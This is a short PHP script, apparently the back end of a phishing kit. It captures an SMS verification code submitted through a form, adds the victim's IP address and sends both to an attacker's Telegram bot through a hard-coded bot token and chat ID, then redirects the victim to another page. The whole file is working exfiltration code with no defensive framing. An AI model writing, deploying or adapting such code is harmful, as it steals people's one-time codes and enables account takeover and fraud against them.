<?php
$ip = getenv("REMOTE_ADDR");
$message .= "---- : || SMS2 || :------\n";
$message .= "SMS2: ".$_POST['sms']."\n";
$message .= "----: || THANKS BE TO GOD || :------\n";
$message .= "IP: ".$ip."\n";

$token = "5830939589:AAEVxfo2qrsrokQrwrLaBfEpu_p7SgGgUeU";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=5468718251&text=" . urlencode($message)."" );
header("Location: loi.html");
?>